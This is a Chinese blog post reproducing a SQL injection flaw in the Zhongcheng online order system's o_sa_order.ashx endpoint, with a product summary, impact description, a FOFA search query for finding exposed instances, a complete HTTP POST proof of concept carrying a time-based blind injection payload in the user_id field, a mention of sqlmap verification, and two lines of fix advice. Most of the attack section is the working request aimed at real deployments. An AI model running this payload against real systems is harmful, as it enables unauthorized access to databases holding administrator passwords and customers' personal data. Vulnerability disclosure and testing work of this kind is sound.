首页 > 数据库 >众诚网上订单系统 o_sa_order.ashx SQL注入漏洞复现

众诚网上订单系统 o_sa_order.ashx SQL注入漏洞复现

时间:2024-09-07 19:26:11浏览次数:15  
标签:zh 漏洞 众诚 订单 ashx SQL order

1 产品简介


众诚网上订单系统通过集成互联网技术和先进的管理思想,为生产制造企业、多分销渠道的批零兼营、各类商贸批发业务提供了一站式的订单管理解决方案。该系统支持电脑PC、平板、手机APP同步操作,实现了订单、商品、客户、资金、信息、支付、物流和电子商务的全方位连接,极大地提升了企业的运营效率和管理水平。

2 漏洞概述

众诚网上订单系统 o_sa_order.ashx 存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

3 复现环境

FOFA

title="众诚网上订单系统"

 

4 漏洞复现

PoC 

POST /ajax/o_sa_order.ashx HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Priority: u=0
 
type=login&user_id=1%27);WAITFOR%20DELAY%20%270:0:5%27--&user_pwd=1

 

sqlmap验证

 

5 修复建议

使用预编译语句。

对进入数据库的特殊字符进行转义处理。

 

 

标签:zh,漏洞,众诚,订单,ashx,SQL,order
From: https://blog.csdn.net/weixin_45790890/article/details/142000778

相关文章

  • X管家listUploadIntelligent.htm接口存在sql注入
    1产品简介章管家是一款集智能印章管理系统、APP、智能终端设备于一体的印章智慧管理解决方案,由上海建业信息科技股份有限公司推出。该产品旨在通过智能化手段,解决企业实体印章使用与管理的难点与痛点,提升印章管理的安全性和效率,为企业印章管理提供了强有力的支持。2漏洞概......
  • SQL必知必会51题
    ※食用指南:文章内容为牛客网《SQL必知必会》51道题重点笔记,用于重复思考错题,加深印象。本文章涉及题目也是《SQL必知必会》书中“挑战题”,题目及答案:《SQL必知必会》随书习题答案练习传送门:SQL必知必会51题目录:SQL72 检索并列出已订购产品的清单SQL78 检索产品名称和描......
  • 828华为云征文|华为云Flexus X实例MySQL性能加速评测及对比
    目录前言一、Flexus云服务器X介绍1.1Flexus云服务器X实例简介1.2Flexus云服务器X实例特点1.3Flexus云服务器X实例场景需求二、Flexus云服务器X购买2.1FlexusX实例购买2.2购买MySQL加速镜像2.3重置密码2.4 登录服务器三、FlexusX实例加速MySQL测试3.1sys......
  • A163-Springboot Vue Mysql校园社团信息管理
    介绍SpringbootVueMysql校园社团信息管理(毕业论文10000字以上,共29页,程序代码,MySQL数据库)【运行环境】IDEA,JDK1.8,Mysql,Node,Vue【技术栈】Java,SpringBoot,Jquery,Layui,MYSQL,HTML,CSS,JAVASCRIPT,Ajax......
  • [ABC328G] Cut and Reorder 题解
    [ABC328G]CutandReorder题解题目不难,思维难度尚可。首先需要发现的性质是\(1\)操作的次数最多只需要使用一次,使用多少次其实都是等价的。\(n\le22\)显然考虑状压dp。平凡的想法是设\(dp_{i,j}\)表示填数的状态为\(i\),最后一个填的是\(j\)位置的数的最小代价。这......
  • mysql sql同一个字段多个行转成一个字段查询
    mysqlsql同一个字段多个行转成一个字段查询如果您想要将MySQL中同一个表的不同行的值合并到一个字段中,您可以使用GROUP_CONCAT()函数。这个函数可以将多个行的值连接起来,并且可以通过SEPARATOR关键字指定分隔符。以下是一个简单的例子,假设我们有一个名为users的表,它有一个name字......
  • 呵,老板不过如此,SQL还是得看我
    2018年7月,大三暑假进行时,时间过得飞快,我到这边实习都已经一个月了。我在没工作之前,我老是觉得生产项目的代码跟我平时自学练的会有很大的区别。以为生产项目代码啥的都会规范很多,比如在接口上会做很多安全性的工作(自学练的时候确实学到的类似的案例),代码设计上会有很多设计模式的应......
  • MySQL的安装4000字详解(小白也能看得懂!!!!)
    MySQL的安装与使用2.1.1MySQL发展历史和版本2.2.1MySQL的安装与配置1.下载MySQL安装文件2.选择下载版本3.安装配置MySQL4.选择安装路径,推荐换到D盘!!!!!5.执行安装6.完成安装,点击next7.配置8.设置账户9.配置服务器10.开始执行11设置router配置,默认即可12.输入密码,检查是否......
  • MySQL——视图(二)视图管理(5)修改视图
    1.使用CREATEORREPLACEVIEW语句修改视图        在MySQL中,使用CREATEORREPLACEVIEW语句修改视图,其基本语法格式如下所示:CREATE[ORREPLACE][ALGORITHM={UNDEFINED|MERGE|TEMPTABLE}]VIEWview_name[(column_list)]ASSELECT_statement[WITH[CASCADE......
  • 如何实现mysql高可用
      1.机器资源耗尽2.单点故障3.认为操作4.网络 单点故障解决方案?1.搭建mysql主从集群(双主,一主多从,多主多从)2.可以用MyCat,ShardingJdbc实现 A节点同步到B节点流程?1.从库通过IO线程,连接到主库,并且向主库要对应的binlog文件2.主库通过dump线程获取binlog文......